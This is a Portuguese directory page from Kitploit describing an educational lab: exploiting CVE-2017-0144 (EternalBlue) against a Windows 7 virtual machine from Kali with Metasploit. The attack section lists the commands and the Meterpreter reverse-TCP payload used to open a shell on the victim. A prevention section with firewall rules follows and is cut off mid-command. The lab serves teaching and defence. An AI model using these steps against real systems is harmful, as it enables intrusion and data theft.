Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Vulnerability-Research-CVE-2017-0144 — LAB: ATAQUE AO SISTEMA OPERACIONAL WINDOWS BASEADO NA VULNERABILIDADE DO PROTOCOLO SMB. | Kitploit
Ferramentas/GitHubGitHub/ducanh2oo3/vulnerability-research-cve-2017-0144
Frameworks de ExploraçãoAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubducanh2oo3/vulnerability-research-cve-2017-0144

Vulnerability-Research-CVE-2017-0144

LAB: ATAQUE AO SISTEMA OPERACIONAL WINDOWS BASEADO NA VULNERABILIDADE DO PROTOCOLO SMB.

Ver Repositório
18há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Vulnerability-Research-CVE-2017-0144

LAB: ATAQUE AO SISTEMA OPERACIONAL WINDOWS BASEADO NA VULNERABILIDADE DO PROTOCOLO SMB. mohinh

  • I. DESCRIÇÃO
    Neste laboratório, usaremos dois computadores para simular um ataque baseado na vulnerabilidade no protocolo SMB do sistema operacional Windows. Uma máquina rodando Kali Linux, atuando como o invasor (hacker). E um computador atuando como a máquina vítima (victim). A máquina vítima está executando o Windows 7 64 bits, que contém a vulnerabilidade SMB. Para fazer isso, na máquina Kali Linux usaremos o código de exploração chamado EternalBlue para atacar a máquina Windows 7.
  • II. INTRODUÇÃO GERAL
  • Server Message Block (SMB) é um protocolo de compartilhamento de arquivos bastante comum na plataforma Windows da Microsoft. Graças a este protocolo SMB, os computadores Windows conectados entre si na mesma rede local ou no mesmo Domínio podem compartilhar arquivos uns com os outros. Atualmente, SMB também é conhecido como Common Internet File Sharing (CIFS).
  • EternalBlue é um código de exploração de vulnerabilidades, baseado na vulnerabilidade do protocolo SMB através da porta 445. Inicialmente, o EternalBlue foi desenvolvido pela Agência de Segurança Nacional dos EUA (NSA). O nome completo em inglês é U.S. National Security Agency. Mas depois, ele foi vazado pelo grupo de hackers The Shadow Brokers em 2017. Também no mesmo ano, ocorreu um grande ataque de ransomware em todo o mundo, visando computadores Windows da Microsoft. O mais famoso foi o vírus WannaCry. Até hoje, embora essa vulnerabilidade tenha sido corrigida pela Microsoft com a atualização de segurança MS17-010, um grande número de computadores em todo o mundo executando Windows ainda apresenta essa vulnerabilidade. Essa vulnerabilidade foi divulgada no CVE-2017-0144 (Vulnerabilidade de Execução Remota de Código no Windows SMB). Esta vulnerabilidade é extremamente perigosa e muito fácil de ser explorada. O que é notável é que, para atacar através dessa vulnerabilidade do protocolo SMB, o hacker não precisa enviar ou enganar a vítima para baixar ou executar qualquer vírus malicioso. Ou seja, mesmo que a vítima não faça nada, ela ainda pode ser facilmente atacada e ter o controle do computador tomado pelo hacker sem sequer perceber.
  • III. PREPARAÇÃO
  • Prepare duas máquinas virtuais rodando no software VMware Workstation. A máquina virtual Kali Linux (máquina do hacker) tem o endereço IP: 192.168.198.140 e a máquina virtual Windows 7 (máquina vítima) tem o endereço IP: 192.168.198.143 mohinh2 1.Na máquina virtual Kali (atacante):
  • -Verificar IP: ifconfig
  • -Iniciar o serviço PostgreSQL: # service postgresql start
  • -Verificar se o PostgreSQL está rodando com o comando: # service postgresql status 2.Na máquina virtual Windows 7 (vítima):
  • Verificar IP: ipconfig
  • Desativar o Firewall.
  • IV. EXECUÇÃO DO ATAQUE.
  • Na máquina Kali: Faça login no Metasploit com o comando: # msfconsole
  • image
  • Quando estiver dentro do Metasploit, procure por exploits e sintaxes relacionadas ao ms17_010 com o comando: # search ms17_010
  • image
  • Adicione o endereço IP da máquina vítima e da máquina atacante
  • Configure o payload para exploração:
  • use 0 -> set payload windows/x64/meterpreter/reverse_tcp:
  • Execute o exploit para realizar a exploração
  • image
  • -Abra um shell na máquina vítima (executado pelo terminal da máquina atacante) após ter invadido: image
  • =>Neste ponto, considera-se que o hacker invadiu com sucesso a máquina vítima. Agora, o hacker pode excluir, roubar arquivos da máquina da vítima sem que ela perceba. Além disso, o hacker pode fazer upload e executar vírus diretamente nela.
  • V. FORMA DE PREVENÇÃO.
  • – Para evitar ser explorado e ter o protocolo SMB utilizado indevidamente, precisamos realizar algumas tarefas:
  • Ativar o Firewall.
  • Atualizar o Windows para a versão mais recente. Ou baixar e instalar os patches de segurança da Microsoft. Especialmente o patch de segurança ms17_010.
  • Bloquear as portas 135, 445.
  • +netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=135 name="Block_Cong_135"
  • +netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 nam
Baixar ferramenta